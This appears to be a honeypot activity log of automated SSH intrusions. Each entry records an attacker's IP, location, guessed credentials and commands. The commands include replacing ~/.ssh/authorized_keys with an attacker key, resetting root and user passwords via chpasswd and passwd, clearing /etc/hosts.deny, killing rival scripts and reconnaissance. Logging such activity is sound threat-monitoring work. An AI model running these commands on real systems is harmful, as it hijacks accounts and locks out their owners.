$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:T5XdKjgtvpDR"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 dragon_root_11 (115.217.106.202) β€” Ningbo, China Β· 2 sessions Β· 39 cmds
2026-05-29 20:26 EDT Β· as linuxacademy/123456, root/vps1234
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "123456\nD5w2EB5bJ8Mz\nD5w2EB5bJ8Mz"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nD5w2EB5bJ8Mz\nD5w2EB5bJ8Mz\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:g6iS79h87HRt"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 rogue_12 (47.86.3.155) β€” Hong Kong, Hong Kong Β· 1 session Β· 1 cmd
2026-05-29 20:28 EDT Β· as wang/wang123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m
🎭 cowboy_root_11 (198.98.56.205) β€” New York, United States Β· 1 session Β· 20 cmds
2026-05-29 20:23 EDT Β· as linuxacademy/123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\niVziIzXcVRrS\niVziIzXcVRrS"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\niVziIzXcVRrS\niVziIzXcVRrS\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 silk_root_15 (14.103.112.55) β€” Beijing, China Β· 1 session Β· 16 cmds
2026-05-29 20:17 EDT Β· as root/Abc@12345
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:1GO0e6ADKWW7"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
🎭 lantern_root_20 (114.234.101.12) β€” Xuzhou, China Β· 2 sessions Β· 40 cmds
2026-05-29 18:29 EDT Β· as gitlab/gitlab, tester/123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "123456\nOeWJn2I8JMT9\nOeWJn2I8JMT9"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "123456\nOeWJn2I8JMT9\nOeWJn2I8JMT9\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "gitlab\na3oGI486WpGN\na3oGI486WpGN"|passwd|bash
$ echo "gitlab\na3oGI486WpGN\na3oGI486WpGN\n"|passwd
🎭 ghost_root_64 (104.199.176.250) β€” Taipei, Taiwan Β· 2 sessions Β· 39 cmds
2026-05-20 04:41 EDT Β· as root/supervisores, tester/123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "123456\nNPWJ4X3EMmtk\nNPWJ4X3EMmtk"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nNPWJ4X3EMmtk\nNPWJ4X3EMmtk\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:jRwiLvdodLvD"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 stein_root_17 (45.144.233.56) β€” Frankfurt Am Main, Germany Β· 2 sessions Β· 40 cmds
2026-05-29 18:25 EDT Β· as gitlab/gitlab, tester/123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "gitlab\nfDZRY38PgsJJ\nfDZRY38PgsJJ"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "gitlab\nfDZRY38PgsJJ\nfDZRY38PgsJJ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "123456\nQpiJJYTI7y7Z\nQpiJJYTI7y7Z"|passwd|bash
$ echo "123456\nQpiJJYTI7y7Z\nQpiJJYTI7y7Z\n"|passwd
🎭 yankee_root_22 (69.73.187.130) β€” Spring, United States Β· 2 sessions Β· 38 cmds
2026-05-29 18:22 EDT Β· as root/12131415, root/root123?
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:O3HcEHAd5HUi"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:gwwIxJ73WYYS"|chpasswd|bash
🎭 tsar_root_4 (79.104.0.82) β€” Moscow, Russia Β· 2 sessions Β· 38 cmds
2026-05-29 18:25 EDT Β· as root/12131415, root/root123?
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:X0Z3moYjlg4M"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:8zgTN2JWFpPo"|chpasswd|bash
🎭 seoul_root_5 (59.16.212.232) β€” Incheon, South Korea Β· 2 sessions Β· 39 cmds
2026-05-21 01:35 EDT Β· as info/info, root/qaz321
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "info\nYenNRGA73wRV\nYenNRGA73wRV"|passwd|bash
$ Enter new UNIX password:
$ echo "info\nYenNRGA73wRV\nYenNRGA73wRV\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:X3YrrZ143OZo"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 rogue_root_52 (185.113.139.51) β€” Riga, Latvia Β· 3 sessions Β· 59 cmds
2026-05-23 14:28 EDT Β· as alex/123qweasd, certftp/certftp, root/Asdf1234
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "certftp\nFZLtYHGUioWs\nFZLtYHGUioWs"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "certftp\nFZLtYHGUioWs\nFZLtYHGUioWs\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "123qweasd\nNvDXpLZ3fsjW\nNvDXpLZ3fsjW"|passwd|bash
$ echo "123qweasd\nNvDXpLZ3fsjW\nNvDXpLZ3fsjW\n"|passwd
$ echo "root:jGUMtNEDhQ8C"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 cipher_root_45 (187.170.222.68) β€” Miguel Hidalgo, Mexico Β· 1 session Β· 20 cmds
2026-05-29 17:24 EDT Β· as certftp/certftp
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "certftp\nyipgbaTegO6N\nyipgbaTegO6N"|passwd|bash
$ Enter new UNIX password:
$ echo "certftp\nyipgbaTegO6N\nyipgbaTegO6N\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 bibimbap_root_6 (59.26.132.170) β€” Yuseong-gu, South Korea Β· 2 sessions Β· 39 cmds
2026-05-22 21:32 EDT Β· as admin/fjbdfdjkdsfs541544, root/changeit
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "fjbdfdjkdsfs541544\nAia4d6w39Hy5\nAia4d6w39Hy5"|passwd|bash
$ Enter new UNIX password:
$ echo "fjbdfdjkdsfs541544\nAia4d6w39Hy5\nAia4d6w39Hy5\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:n1agLZ6tQEGU"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 yankee_root_23 (172.96.14.104) β€” Kansas City, United States Β· 2 sessions Β· 40 cmds
2026-05-29 12:52 EDT Β· as admin/fjbdfdjkdsfs541544, user/123456789
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
